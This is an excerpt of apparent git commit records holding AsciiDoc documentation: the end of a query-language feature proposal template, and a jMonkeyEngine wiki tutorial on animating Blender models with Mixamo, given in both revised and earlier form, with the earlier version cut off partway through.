(https:\/\/en.wikipedia.org\/wiki\/Extended_Backus-Naur_Form) format, along with explanatory text.\n\n*_Example:_* +\n_Extend expressions to support string search operators:_\n\n----\nexpression = current definition of expression\n | string-search\n ;\n\nstring-search = starts with | ends with | contains ;\nstarts-with = expression, \"STARTS\", \"WITH\", expression ;\nends-with = expression, \"ENDS\", \"WITH\", expression ;\ncontains = expression, \"CONTAINS\" expression ;\n----\n\n=== Semantics\n\nProvide a description of the expected semantics of the new feature(s).\n\n*_Example:_* +\n_STARTS WITH_\n\n_Using `lhs STARTS WITH rhs` requires both `lhs` and `rhs` to be strings. This new expression evaluates to true if `lhs` textually starts with `rhs`. Otherwise, it is false._\n\n_ENDS WITH_\n\n_Using `lhs ENDS WITH rhs` requires both `lhs` and `rhs` to be strings. 
This new expression evaluates to true if `lhs` textually contains `rhs`. Otherwise, it is false._\n\n_If any argument to `STARTS WITH`, `ENDS WITH`, or `CONTAINS` is NULL, then the result of evaluating the whole predicate is NULL._\n\n_It is a type error to use `STARTS WITH`, `ENDS WITH`, or `CONTAINS` with a value that is not a string._\n\n=== Interaction with existing features\n\nDetail any interactions which need to be considered.\n\n=== Alternatives\n\nList any alternatives here; e.g. new keywords, a smaller feature set etc.\n\n== What others do\n\nIf applicable, include a feature comparison table, along with any useful links.\n\nTo provide a well-rounded comparison, please ensure the inclusion of at least one SQL-based implementation - such as DB2 or Postgres - as well as SPARQL. If you require any assistance or pointers to the latter, please contact petra.selmer@neotechnology.com.\n\n== Benefits to this proposal\n\nList the benefits here.\n\n== Caveats to this proposal\n\nList any caveats here. These may include omissions, reasons for non-conformance with other features and so on.\n\n== Appendix\n\nPut any supplementary information here.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"89ed28188edcff8d3356f9794195d372533701b0","subject":"link to image","message":"link to image\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"docs\/modules\/tutorials\/pages\/how-to\/modeling\/blender\/mixamo.adoc","new_file":"docs\/modules\/tutorials\/pages\/how-to\/modeling\/blender\/mixamo.adoc","new_contents":"= Animating Blender Models With Mixamo\n:revnumber: 2.0\n:revdate: 2020\/07\/15\n\n\n\n== Using Mixamo For Model Animation\n\nWith very little effort, you can use Adobe's Mixamo to fully animate your Blender models. Once you understand the process, that is.\n\nThis guide requires:\n\n* link:https:\/\/www.blender.org\/download\/[Blender version 2.78c+] with its default settings. The exception is that `Select With:`, under `menu:File[User Preferences > Input]`, is set to `Left Click`.\n* Blender FBX file importing and exporting enabled.\n* A modest amount of Blender knowledge.\n* A link:https:\/\/www.mixamo.com\/[Mixamo] account.\n\n\n== Prepare to Export\n\nTo properly animate your models, there are a few rules you should follow.\n\n* Read the link:https:\/\/helpx.adobe.com\/creative-cloud\/faq\/mixamo-faq.html[Common Questions] guide before you do anything else.\n* Clean up your Blender file prior to exporting. This means you have a game-ready model that will become the base for all your animations. Do this in a copy of your file so you have the original as a backup. The following checklist is provided for your convenience.\n[%interactive]\n- [ ] You have no Animations.\n- [ ] You have applied a triangulate modifier. Some exporters other than Ogre have an option to apply the modifier on export. This would be the preferred method.\n- [ ] You have UV Mapped your model. It isn't required by Mixamo, just for loading your models into jME3.\n- [ ] Your model's origin is at the base of the mesh.\n- [ ] You have your materials and textures done for your model. 
It isn't required by Mixamo, just for loading your model into jME3.\n- [ ] You have xref:jme3\/external\/blender\/blender_buffer_clearing.adoc[cleared your buffers]. It isn't required by Mixamo, it just makes your models cleaner for jME3.\n- [ ] You have applied the Location, Rotation, and Scale to your model.\n- [ ] *MOST IMPORTANT OF ALL*, in the `menu:Properties Panel[Scene Tab > Units Panel]` set the btn:[Unit of Measure] to Meters and the Length to Metric. Adobe uses centimeters for the FBX exporter and if this is not set, the model's scale will be unusual to say the least. JME3 uses 1 WU = whatever you determine, but meters will make things easier for all aspects of your modeling. If you are doing this now, you may have to re-scale your model before proceeding.\n\n[TIP]\n====\nSee xref:jme3\/external\/blender.adoc[Creating assets in Blender3D] for help on creating jME3 compatible models.\n====\n\n== Blender FBX Export\n\n\n. In the `3d Viewport`, select your model; it will be highlighted in orange.\n. In the `Info` header, select `menu:File[Export > FBX]`.\n. Enter a file path to export to, usually the same folder as your `.blend` file for simplicity.\n. Enter a file name.\n. In the `Export FBX` panel, located in the bottom left of the export dialog:\nMain Tab::\n- [x] Selected Objects\n- Scale = 1\n+\n[IMPORTANT]\n====\nClick the button next to scale to deselect btn:[Scale all data]. Failure to do so will destroy the scale of your model. If the button is selected, it will be dark in color.\n====\n\n- Forward = -Z Forward\n- Up = Y Up\n- Which kind of object to export = Mesh\nGeometries Tab::\n- [x] Apply Modifiers\n. When you are done, click the btn:[Export FBX] button to export the file.\n\n[TIP]\n====\nYou can save these FBX export settings by clicking the btn:[+] button next to btn:[Operator Presets].\n====\n\n\n== Mixamo FBX Import\n\n\n. Create a link:https:\/\/www.mixamo.com\/#\/[Mixamo] account and log in.\n. From the `Default Character` panel, select `Upload Character`.\n. Navigate to the file to be uploaded or drag and drop it onto the file uploader.\n. Select `Open`.\n\n[NOTE]\n====\nGenerally, if at any time during the import and rigging process the model does not appear within the time specified in the dialog that is showing, something has gone wrong and you will have to restart the process.\n====\n\n== Mixamo Auto-Rigger\n\n\nIf everything went well, the `Auto-Rigger` will open and your model will be facing you. If not, fix your model in Blender before proceeding.\n\n. If the model is facing you, click btn:[Next].\n. In this panel you will rig your model. Place the markers as shown in the Auto-Rigger dialog image.\n+\n[NOTE]\n====\nRemember that the model is facing you, so its right is on your left.\n====\n\n. Select the LOD you are after. This is based on how many bones you want the hand of the model to have. Feel free to cycle through the options to see what each one does.\n. When you are through, click the btn:[Next] button to rig your model.\n. When the model appears, if satisfied with the results, click `Finish`.\n\n\n== Mixamo Animations\n\n\n. In the far right panel select btn:[Find Animations].\n. After deciding on an animation, click the animation to have it applied to your model.\n. After the animation is applied to your model, toggle the btn:[In Place] checkbox if it's a moving animation.\n+\n[TIP]\n====\nYou can make small adjustments to the animation by using the sliders. The most common adjustment you will make is the `Character Arm-Space`. 
If you find the model's hands are clipping through the model, then use this slider to remedy the situation.\n====\n\n. When satisfied with the animation, select the btn:[Download] button and follow the `Mixamo Download` instructions below.\n\nIf you wish to add more animations, after the download, remove the animation by clicking on the btn:[X] button located next to the animation's name. Add your new animation and, when satisfied, download the new animation. Repeat as often as is necessary.\n\n\n== Mixamo Download\n\n\nWhen downloading `*Animations*` from Mixamo:\n\n. Make sure the btn:[In Place] checkbox is selected if it's a moving animation.\n. In the `Download Settings` dialog, use the default settings.\n* Format = FBX\n* Skin = With Skin\n* Frames per second = 30\n* Keyframe Reduction = none\n. Click btn:[Download] and save it to your computer.\n\nWhen downloading `*Characters*` from Mixamo:\n\n. In the `Download Settings` dialog, the `Format` is FBX and `Pose` is TPose.\n. Click btn:[Download] and save it to your computer.\n\n\n== Creating Blender Animations\n\nDownload your TPose model using the instructions for downloading `*Characters*` given above. We will use it as our newly rigged model for Blender. To keep things organized, we will create a `.blend` file for every animation and later use a separate `.blend` file to combine all animations into one jME3 compatible animation.\n\nThe following steps apply to any animation you want to add in the future.\n\n. Start Blender if it is not already open.\n. In the `Info` header, at the top of the program, select `menu:File[New > Reload Startup]`.\n. Select the default cube and delete it.\nScene Tab::\n* In the `Properties` panel, located at the bottom right, select the `Scene` tab.\n* In the `Units` panel, change the `Units of measure` to `Meters` and `Length` to `Metric`. You must *always* have these settings when importing from or exporting to Mixamo.\n+\n[TIP]\n====\nYou should create and save a default startup file in Blender, `menu:File[Save Startup File]`. This way you will not have to constantly redo things. Setting your `Units of measure` is the least you should do. You can always restore the default startup file by selecting `menu:File[Load Factory Settings]` at any time.\n====\n\n. In the `Info` header, select `menu:File[Import > FBX]`.\n. Select the FBX file you downloaded earlier.\n. In the `Import Fbx` panel located at the bottom left of the import dialog, leave all settings at their defaults.\nMain::\n- Scale = 1\n- [x] Import Normals\n- [x] Import Animations\n- Armature offset = 1\n- [x] Image Search\n- Decal offset = 0\n- [x] Use pre\/post rotation\nArmatures::\n- Nothing checked\n. When ready, click btn:[Import FBX].\n. After Blender imports the file, both the armature and model are selected; in this order, select `menu:Object[Apply > Rotation]`. Repeat this for the `Location` and `Scale`. Alternatively, select the armature and model individually and repeat the process.\n. Select the Armature.\n. In the `Timeline`, determine the Length of the animation by btn:[RMB] selecting the last keyframe in the timeline. +\n Set `End:` to this value.\n. Click the btn:[Jump to start frame] button to reset the timeline back to the first frame.\n. In the `Info` header, change the `Default` screen layout to `Animation`.\n. In the `Dope Sheet Editor`, change the `Dope Sheet` mode\/context to `Action Editor`. The `Linked Action` will now show the action name of the animation you imported.\n. Rename this to the name of the imported animation. 
In this instance it was TPose.\n. Select the btn:[F] button to save the action.\n. Save your file with the same name as the action.\n\n[NOTE]\n====\nMixamo sets the rotation mode of bones to `Quaternion` as is appropriate for preventing link:https:\/\/en.wikipedia.org\/wiki\/Gimbal_lock[`Gimbal Lock`]. Keep this in mind if you decide to modify your animation. Blender defaults to `XYZ Euler` so you will need to change this setting prior to inserting new keyframes.\n====\n\n== Creating The Rigged Animation File\n\n\nIt's good practice to have a separate file for combining animations. Things can go wrong, animations may change, and you don't want to destroy your original model file by accident. Our plan of attack has been to create a `.blend` file for every animation and then use this separate rigged file to combine them into one. To keep it simple we will use a copy of the first animation we downloaded and created a `.blend` file for.\n\nYou create a rigged animation file only one time per model.\n\n. If you have closed the TPose.blend file, open it. In the `Info` header, select `menu:File[Save As]` and save the file using the model's name with the word `Rigged` added. This will be the only file we add animations to, for this model, from now on. It has our default TPose action which will allow us to start our animation track for `Ogre` animation exporting.\n. Select your `Armature`.\nObject Tab::\n.. In the `Properties` panel, navigate to the `Object` tab. In the `Display` panel, toggle `X-Ray` on.\n. With your mouse inside the `3d Viewport`, press kbd:[Numpad 1] followed by kbd:[Numpad 5].\n. kbd:[Tab] into `Edit Mode`.\n. Set the `3d Cursor` to the model's origin.\n. Select `menu:Add[Single Bone]`.\n+\n[IMPORTANT]\n====\nThe model's origin and the `Root` bone origin must be at the same location.\n====\n\n. Scale the bone down or up as needed by selecting the `Tip` (ball at the narrowest part of the bone) and dragging the `Z` arrow (blue arrow) of the manipulator up or down until you are satisfied with its scale. *DO NOT CHANGE THE ANGLE OR MOVE THE BASE OF THE BONE FROM CENTER*.\n. When satisfied with the scale, select the body of the bone to select the entire bone.\nBone Tab::\n.. In the `Properties` panel, navigate to the `Bone` tab.\n.. Rename the bone to `Root`.\n.. Deselect the `Deform` panel checkbox.\n. In the `3d Viewport`, select the body of the armature's `Hip` bone, the lowest bone in the center of the armature, to select the entire bone.\n. While holding kbd:[Shift] down, btn:[LMB] select the `Root` bone.\n. Press kbd:[Ctrl] + kbd:[P].\n. In the `Make Parent` dialog, choose `Keep Offset`.\n. With the mouse inside the 3d Viewport, kbd:[Tab] out of `Edit Mode`.\n. Select your model.\nData Tab::\n.. In the `Properties` panel, navigate to the `Data` tab and make sure the `Mesh` has the same name as your model.\nMaterial Tab::\n.. In the `Properties` panel, navigate to the `Material` tab and make sure there is one `Material` in the `Material List` and it is the same name as your model.\n.. In the `Transparency` panel, move the `Alpha` slider to 1.\n+\n[IMPORTANT]\n====\nThere appears to be a bug where the FBX importer adds an `Alpha` map texture to your model. If the `Alpha` slider is not at one, and you use the Blender importer of the SDK, or convert a .blend file, it will be transparent. `Ogre` export is unaffected.\n====\n\n.. Deselect the checkbox of the `Transparency` panel.\nTexture Tab::\n.. 
In the `Properties` panel, navigate to the `Texture` tab; you will note that your texture has duplicate names in the `Texture List`. The bottom texture is actually a transparent `Alpha` texture and appears to be a bug. Select the *second* texture in the `*Texture List*` to highlight it.\n.. While holding down the kbd:[Shift] key, press the btn:[X] button next to the `*Texture Data Block*` to delete it.\n.. Select your remaining texture in the `Texture List` to highlight it. You will note the `Texture Data Block` is now red due to no texture being assigned.\n.. Click on the btn:[Browse Texture to be linked] button next to the `Texture Data Block` and select your texture.\n.. In the `Image` panel, click the btn:[Small Box] button located next to your texture's path to pack the image file.\n. In the `Info` header, change the layout from `Animation` to `UV Editing`.\n. With your mouse inside the `3d Viewport` and the model still selected, kbd:[Tab] into edit mode. If your model is not completely orange, press kbd:[A] until all vertices are selected. You will see your UV Mapped mesh appear in the `UV Image Editor` window.\n. In the `UV Image Editor`, click the btn:[Browse Image to be linked] button and select your UV image.\n. kbd:[Tab] out of `Edit Mode`.\n. In the `Info` header, change the layout from `UV Editing` to `Default` and then click the btn:[+] button to create a new layout.\n. Rename this new layout `NLA Editing`.\n. Click the `Current Editor Type` button, located at the bottom left (small box) of the `3d Viewport`, and change it from `3d View` to `NLA Editor`. Our TPose action is now visible.\n+\nNOTE: If the action is not visible, navigate to the `Dope Sheet Editor` and from the `Action Editor` context, select the `Action`.\n\n. Click the icon:angle-double-down[] button to push the action down into the stack.\n. Beneath the TPose strip you will see a slider. Drag this slider to the right until your strip is nested up against the left margin of the window.\n. Save your file.\n\n\n== Export\n\n\nYour rigged file is now ready to export. Export your model using one of the xref:jme3\/features.adoc#supported-external-file-types[Supported External File Types] of your choice.\n\n\n== Appending Blender Animations\n\nFollow the directions for xref:jme3\/advanced\/mixamo.adoc#mixamo-animations[Mixamo Animations], xref:jme3\/advanced\/mixamo.adoc#mixamo-download[Mixamo Download], xref:jme3\/advanced\/mixamo.adoc#creating-blender-animations[Creating Blender Animations], xref:jme3\/external\/blender.adoc#action-baking[Blender Action Baking] and xref:jme3\/external\/blender\/blender_buffer_clearing.adoc#the-linked-action-buffer[Clearing The Linked Action Buffer] for all animations you wish to append to your *rigged* animation file.\n\n. If your `Rigged` file is closed, open it.\n. From the `Info` header, change the Layout to `Default`.\n. In the `3d Viewport`, select the armature of the model.\n. From the `Info` header, select `menu:File[Append]`.\n. Navigate to, and select the `.blend` animation file you want to append.\n. From the folders list, select the `Action` folder, followed by your action.\n. When ready, select the btn:[Append From Library] button to finalize your selection.\n. From the `Info` header, change your layout to `Animation`.\n. In the `Dope Sheet Editor`, change the context to `Action Editor` if not already selected.\n. Click the btn:[Action to be linked] button and select your append action from the list.\n. Select the btn:[F] button to save the action.\n. 
From the `Info` header, change the layout from `Animation` to the `NLA Editing` layout we created in the xref:jme3\/advanced\/mixamo.adoc#creating-the-rigged-animation-file[Creating The Rigged Animation File] section of this tutorial. You will see your append `Action` at the top of the list.\n. From the `NLA Editor` header, select `menu:Add[Add Tracks]`. A new track has now been added to the top of the list.\n. Click the icon:angle-double-down[] button next to the `Action` to push it down into the stack.\n. btn:[LMB] select the strip to make it the only strip selected.\n. btn:[LMB] drag the selected strip to the right until there is at least a 4-keyframe gap between the furthest strip to the right in the list and the append strip you are dragging.\n+\n[TIP]\n====\nWhen the strip is in drag mode it will be purple. While in drag mode you do not need to keep the btn:[LMB] pressed.\n====\n\n. When you are satisfied with the position, btn:[LMB] click the strip to finalize your selection. Your append strip should now be the furthest strip to the right in the list.\n+\n[TIP]\n====\nYou can use the mouse scroll wheel to shrink or expand the strip window to bring all strips into the view.\n\nYou can drag the slider, at the bottom of the strip window, to the right or left to position the strips against the side of the window.\n====\n\n. With the mouse inside the strip window, press the kbd:[N] key to open the properties window.\n. In the `Active Strip` panel, under `Strip Extents`, you will see the `End Frame` number. In the `Timeline`, set `End:` to this number. Every time you append an `Action`, you must increase this number to equal the total length of all strips combined, including the gaps between strips.\n. Save your file.\n\nYour file is now ready to xref:jme3\/advanced\/mixamo.adoc#export[export].\n\n[IMPORTANT]\n====\nPrior to export:\n\nIn the `NLA Editor`, make sure no `Actions` are waiting to be pushed down into the stack. If there are, they must be removed or made into strips prior to export.\n\nIn the `Dope Sheet Editor`, make sure no `Actions` are selected in the `Action Editor` context. If one is selected, it will be sitting at the top of the `NLA Editor` stack.\n\nAn `Action` that has not been pushed down into the `NLA Stack` will block your `NLA Strip` from playing.\n\nSome export methods bake your actions automatically on export, others don't. Test the animation in-game and if your animations are all messed up, try xref:jme3\/external\/blender.adoc#action-baking[baking them] or use a different exporter.\n====\n\nYour NLA strip should look something like this:\n\nimage::how-to\/modeling\/blender\/MixamoNLA.png[MixamoNLA.png,width=\"\",height=\"\"]\n\n\n== Notes\n\n\n* You can see a similar video demonstration of this entire process in xref:jme3.adoc#animations-and-scenes[Animations And Scenes] under the CadNav icon:long-arrow-right[] Mixamo icon:long-arrow-right[] JME Workflow heading.\n* See xref:tutorials:beginner\/hello_animation.adoc[Hello Animation] and xref:jme3\/advanced\/animation.adoc[Animation in JME3] to learn how to use your animated model.\n","old_contents":"= Animating Blender Models With Mixamo\n:revnumber: 2.0\n:revdate: 2020\/07\/15\n\n\n\n== Using Mixamo For Model Animation\n\nWith very little effort, you can use Adobe's Mixamo to fully animate your Blender models. Once you understand the process, that is.\n\nThis guide requires:\n\n* link:https:\/\/www.blender.org\/download\/[Blender version 2.78c+] with its default settings. 
The exception being `Select With:`, under `menu:File[User Preferences > Input]` is set to `Left Click`.\n* Blender FBX file Importing and Exporting, enabled.\n* A Modest amount of Blender knowledge.\n* A link:https:\/\/www.mixamo.com\/[Mixamo] account.\n\n\n== Prepare to Export\n\nTo properly animate your models there are a few rules you should follow.\n\n* Read the link:https:\/\/helpx.adobe.com\/creative-cloud\/faq\/mixamo-faq.html[Common Questions] guide before you do anything else.\n* Clean up your Blender file prior to exporting. This means you have a game ready model that will become the base for all your animations. Do this in a copy of your file so you have the original as a backup. The following checklist is provided for your convenience.\n[%interactive]\n- [ ] You have no Animations.\n- [ ] You have applied a triangulate modifier. Some exporters other than Ogre, have an option to apply the modifier on export. This would be the preferred method.\n- [ ] You have UV Mapped your model. It isn't required by Mixamo, just for loading your models into jme.\n- [ ] Your models origin is at the base of the mesh.\n- [ ] You have your materials and textures done for your model. It isn't required by Mixamo, just for loading your model into jme.\n - [ ] You have xref:jme3\/external\/blender\/blender_buffer_clearing.adoc[cleared your buffers]. It isn't required by Mixamo, just makes your models cleaner for jme.\n- [ ] You have applied the Location, Rotation, and Scale to your model.\n- [ ] *MOST IMPORTANT OF ALL*, in the `menu:Properties Panel[Scene Tab > Units Panel]` set the btn:[Unit of Measure] to Meters and the Length to Metric. Adobe uses centimeters for the FBX exporter and if this is not set the models scale will be unusual to say the least. JME3 uses 1 WU = whatever you determine but meters will make things easier for all aspects of your modeling. If you are doing this now, you may have to re-scale your model before proceeding.\n\n[TIP]\n====\nSee xref:jme3\/external\/blender.adoc[Creating assets in Blender3D] for help on creating jME3 compatible models.\n====\n\n== Blender FBX Export\n\n\n. In the `3d Viewport`, select your model, it will be high-lighted in orange.\n. In the `Info` header, select `menu:File[Export > FBX]`.\n. Enter a file path to export to, usually the same folder as your `.blend` file for simplicity.\n. Enter a file name.\n. In the `Export FBX` panel, located in the bottom left of the export dialog:\nMain Tab::\n- [x] Selected Objects\n- Scale = 1\n+\n[IMPORTANT]\n====\nClick the button next to scale to deselect btn:[Scale all data]. Failure to do so will destroy the scale of your model. If the button is selected, it will be dark in color.\n====\n\n- Forward = -Z Forward\n- Up = Y Up\n- Which kind of object to export = Mesh\nGeometries Tab::\n- [x] Apply Modifiers\n. When you are done, click the btn:[Export FBX] button to export the file.\n\n[TIP]\n====\nYou can save these FBX export settings by clicking the btn:[+] button next to btn:[Operator Presets].\n====\n\n\n== Mixamo FBX Import\n\n\n. Create an link:https:\/\/www.mixamo.com\/#\/[Mixamo] account and login.\n. From the `Default Character` panel, select `Upload Character`.\n. Navigate to the file to be uploaded or drag and drop it onto the file up-loader.\n. 
Select `Open`.\n\n[NOTE]\n====\nGenerally, if at any time during the import and rigging process the model does not appear within the time specified in the dialog that is showing, something has gone wrong and you will have to restart the process over.\n====\n\n== Mixamo Auto-Rigger\n\n\nIf everything went well the `Auto-Rigger` will open and your model will be facing you. If not, fix your model in Blender before proceeding.\n\n. If the model is facing you, click btn:[Next].\n. In this panel you will rig your model. Place the markers as shown in the Auto-Rigger dialog image.\n+\n[NOTE]\n====\nRemember that the model is facing you so its right is on your left.\n====\n\n. Select the LOD you are after. This is based off how many bones you want the hand of the model to have. Feel free to cycle through the options to see what each one does.\n. When you are through click the btn:[Next] button to rig your model.\n. When the model appears, if satisfied with the results, click `Finish`.\n\n\n== Mixamo Animations\n\n\n. In the far right panel select btn:[Find Animations].\n. After deciding on an animation, click the animation to have it applied to your model.\n. After the animation is applied to your model, toggle the btn:[In Place] checkbox if it's a moving animation.\n+\n[TIP]\n====\nYou can make small adjustments to the animation by using the sliders. The most common adjustment you will make is the `Character Arm-Space`. If you find the models hands are clipping through the model then use this slider to remedy the situation.\n====\n\n. When satisfied with the animation, select the btn:[Download] button and follow the `Mixamo Download` instructions below.\n\nIf you wish to add more animations, after the download, remove the animation by clicking on the btn:[X] button located next to the animations name. Add your new animation and when satisfied, download the new animation. Repeat as often as is neccessary.\n\n\n== Mixamo Download\n\n\nWhen downloading `*Animations*` from Mixamo:\n\n. Make sure the btn:[In Place] checkbox is selected if it's a moving animation.\n. In the `Download Settings` dialog use the default settings.\n* Format = FBX\n* Skin = With Skin\n* Frames per second = 30\n* Keyframe Reduction = none\n. Click btn:[Download] and save it to your computer.\n\nWhen downloading `*Characters*` from Mixamo:\n\n. In the `Download Settings` dialog the `Format` is FBX and `Pose` is TPose.\n. Click btn:[Download] and save it to your computer.\n\n\n== Creating Blender Animations\n\nDownload your TPose model using the instructions for downloading `*Characters*` given above. We will use it as our newly rigged model for Blender. To keep things organized we will create a `.blend` file for every animation and later use a separate `.blend` file to combine all animations into one jME3 compatible animation.\n\nThe following steps apply to any animation you want to add in the future.\n\n. Start Blender if it is not already open.\n. In the `Info` header, at the top of the program, select `menu:File[New > Reload Startup]`.\n. Select the default cube and delete it.\nScene Tab::\n* In the `Properties` panel, located at the bottom right, select the `Scene` tab.\n* In the `Units` panel, change the `Units of measure` to `Meters` and `Length` to `Metric`. You must *always* have these settings when importing from or exporting to Mixamo.\n+\n[TIP]\n====\nYou should create and save a default startup file in Blender. `menu:File[Save Startup File]`. This way you will not have to constantly redo things. 
Setting your `Units of measure` is the least you should do. You can always restore the default startup file by selecting `menu:File[Load Factory Settings]` at any time.\n====\n\n. In the `Info` header, select `menu:File[Import > FBX]`.\n. Select the FBX file you downloaded earlier.\n. In the `Import Fbx` panel located at the bottom left of the import dialog, leave all settings at their defaults.\nMain::\n- Scale = 1\n- [x] Import Normals\n- [x] Import Animations\n- Armature offset = 1\n- [x] Image Search\n- Decal offset = 0\n- [x] Use pre\/post rotation\nArmatures::\n- Nothing checked\n. When ready click btn:[Import FBX].\n. After Blender imports the file, both the armature and model are selected, in this order, select `menu:Object[Apply > Rotation]`. Repeat this for the `Location` and `Scale`. Alternatively, select the armature and model individually and repeat the process.\n. Select the Armature.\n. In the `Timeline`, determine the Length of the animation by btn:[RMB] selecting the last keyframe in the timeline. +\n Set `End:` to this value.\n. Click the btn:[|xref:] button to reset timeline back to the first frame.\n. In the `Info` header, change the `Default` screen layout to `Animation`.\n. In the `Dope Sheet Editor`, change the `Dope Sheet` mode\/context to `Action Editor`. The `Linked Action` will now show the action name of the animation you imported.\n. Rename this to the name of the imported animation. In this instance it was TPose.\n.\u00a0 Select the btn:[F] button to save the action.\n.\u00a0 Save your file with the same name as the action.\n\n[NOTE]\n====\nMixamo sets the rotation mode of bones to `Quaternion` as is appropriate for preventing link:https:\/\/en.wikipedia.org\/wiki\/Gimbal_lock[`Gimbal Lock`]. Keep this in mind if you decide to modify your animation. Blender defaults to `XYZ Euler` so you will need to change this setting prior to inserting new keyframes.\n====\n\n== Creating The Rigged Animation File\n\n\nIt's good practice to have a separate file for combining animations. Things can go wrong, animations may change, and you don't want to destroy your original model file by accident. Our plan of attack has been we create a .blend file for every animation and then use this separate rigged file to combine them into one. To keep it simple we will use a copy of the first animation we downloaded and created a `.blend` file for.\n\nYou create a rigged animation file only one time per model.\n\n. If you have closed the TPose.blend file, open it. In the `Info` header select `menu:File[Save As]` and save the file using the models name with the word `Rigged` added. This will be the only file we add animations to, for this model, from now on. It has our default TPose action which will allow us to start our animation track for `Ogre` animation exporting.\n. Select your `Armature`.\nObject Tab::\n.. In the `Properties` panel, navigate to the `Object` tab. In the `Display` panel toggle `X-Ray` on.\n. With your mouse inside the `3d Viewport`, press kbd:[Num Pad 1] followed by kbd:[Numpad 5].\n. kbd:[Tab] into `Edit Mode`.\n. Set the `3d Cursor` to the models origin.\n. Select `menu:Add[Single Bone]`.\n+\n[IMPORTANT]\n====\nThe models origin and the `Root` bone origin must be at the same location.\n====\n\n. Scale the bone down or up as needed by selecting the `Tip` (ball at the narrowest part of the bone) and dragging the `Z` arrow (blue arrow) of the manipulator up or down until you are satisfied with its scale. 
*DO NOT CHANGE THE ANGLE OR MOVE THE BASE OF THE BONE FROM CENTER*.\n. When satisfied with the scale, select the body of the bone to select the entire bone.\nBone Tab::\n.. In the `Properties` panel, navigate to the `Bone` tab.\n.. Rename the bone to `Root`.\n.. Deselect the `Deform` panel checkbox.\n. In the `3d Viewport`, select the body of the armatures `Hip` bone, the lowest bone in the center of the armature, to select the entire bone.\n. While holding kbd:[Shift] down, btn:[LMB] select the `Root` bone.\n. Press kbd:[Ctrl] + kbd:[P].\n. In the `Make Parent` dialog choose `Keep Offset`.\n. With the mouse inside the 3d Viewport, kbd:[Tab] out of `Edit Mode`.\n. Select your model.\nData Tab::\n.. In the `Properties` panel, navigate to the `Data` tab and make sure the `Mesh` has the same name as your model.\nMaterial Tab::\n.. In the `Properties` panel, navigate to the `Material` tab and make sure there is one `Material` in the `Material List` and it is the same name as your model.\n.. In the `Transparency` panel, move the `Alpha` slider to 1.\n+\n[IMPORTANT]\n====\nThere appears to be a bug where the FBX importer adds an `Alpha` map texture to your model. If the `Alpha` slider is not at one, and you use the Blender importer of the SDK, or convert a .blend file, it will be transparent. `Ogre` export is unaffected.\n====\n\n.. Deselect the checkbox of the `Transparency` panel.\nTexture Tab::\n.. In the `Properties` panel, navigate to the `Texture` tab, you will note that your texture has duplicate names in the `Texture List`. The bottom texture is actually a transparent `Alpha` texture and appears to be a bug. Select the *second* texture in the `*Texture List*` to highlight it.\n.. While holding down the kbd:[Shift] key, press the btn:[X] button next to the `*Texture Data Block*` to delete it.\n.. Select your remaining texture in the `Texture List` to highlight it. You will note the `Texture Data Block` is now red due to no texture being assigned.\n.. Click on the btn:[Browse Texture to be linked] button next to the `Texture Data Block` and select your texture.\n.. In the `Image` panel, click the btn:[Small Box] button located next to your texture's path to pack the image file.\n. In the `Info` header, change the layout from `Animation` to `UV Editing`.\n. With your mouse inside the `3d Viewport` and the model still selected, kbd:[Tab] into edit mode. If your model is not completely orange press kbd:[A] untill all vertices are selected. You will see your UV Mapped mesh appear in the `UV Image Editor` window.\n. In the `UV Image Editor`, click the btn:[Browse Image to be linked] button and select your UV image.\n. kbd:[Tab] out of `Edit Mode`.\n. In the `Info` header, change the layout from `UV Editing` to `Default` and then click the btn:[+] button to create a new layout.\n. Rename this new layout `NLA Editing`.\n. Click the `Current Editor Type` button, located at the bottom left (small box) of the `3d Viewport`, and change it from `3d View` to `NLA Editor`. Our TPose action is now visible.\n+\nNOTE: If the action is not visible, navigate to the `Dope Sheet Editor` and from the `Action Editor` context, select the `Action`.\n\n. Click the icon:angle-double-down[] button to push the action down into the stack.\n. Beneath the TPose strip you will see a slider. Drag this slider to the right until your strip is nested up against the left margin of the window.\n. Save your file.\n\n\n== Export\n\n\nYour rigged file is now ready to export. 
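Before choosing an exporter, it can be worth planning a quick smoke test from the jME3 side for later, once the exported model has been converted to a `.j3o` asset. The following is only a sketch; the asset path, the class name, and the `TPose` animation name are placeholders rather than anything defined by this tutorial:\n\n[source,java]\n----\nimport com.jme3.animation.AnimChannel;\nimport com.jme3.animation.AnimControl;\nimport com.jme3.app.SimpleApplication;\nimport com.jme3.scene.Spatial;\n\npublic class AnimationSmokeTest extends SimpleApplication {\n\n    public static void main(String[] args) {\n        new AnimationSmokeTest().start();\n    }\n\n    @Override\n    public void simpleInitApp() {\n        \/\/ load the converted model; adjust the path to match your assets folder\n        Spatial model = assetManager.loadModel(\"Models\/MyModel\/MyModel.j3o\");\n        rootNode.attachChild(model);\n\n        \/\/ depending on the exporter, the AnimControl may sit on a child node\n        AnimControl control = model.getControl(AnimControl.class);\n        System.out.println(\"Animations found: \" + control.getAnimationNames());\n\n        \/\/ play one of the names printed above\n        AnimChannel channel = control.createChannel();\n        channel.setAnim(\"TPose\");\n    }\n}\n----\n\n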
Export your model using one of the xref:jme3\/features#supported-external-file-types,Supported External File Types] of your choice.\n\n\n== Appending Blender Animations\n\nFollow the directions for xref:jme3\/advanced\/mixamo.adoc#mixamo-animations.adoc[Mixamo Animations], xref:jme3\/advanced\/mixamo.adoc#mixamo-download.adoc[Mixamo Download], xref:jme3\/advanced\/mixamo.adoc#creating-blender-animations.adoc[Creating Blender Animations], xref:jme3\/external\/blender.adoc#action-baking[Blender Action Baking] and xref:jme3\/external\/blender\/blender_buffer_clearing#the-linked-action-buffer,Clearing The Linked Action Buffer] for all animations you wish to append to your *rigged* animation file.\n\n. If your `Rigged` file is closed, open it.\n. From the `Info` header, change the Layout to `Default`.\n. In the `3d Viewport`, select the armature of the model.\n. From the `Info` header, select `menu:File[Append]`.\n. Navigate to, and select the `.blend` animation file you want to append.\n. From the folders list select the `Action` folder, followed by your action.\n. When ready, select the btn:[Append From Library] button to finalize your selection.\n. From the `Info` header, change your layout to `Animation`.\n. In the `Dope Sheet Editor`, change the context to `Action Editor` if not already selected.\n. Click the btn:[Action to be linked] button and select your append action from the list.\n. Select the btn:[F] button to save the action.\n. From the `Info` header, change the layout from `Animation` to the `NLA Editing` layout we created in the 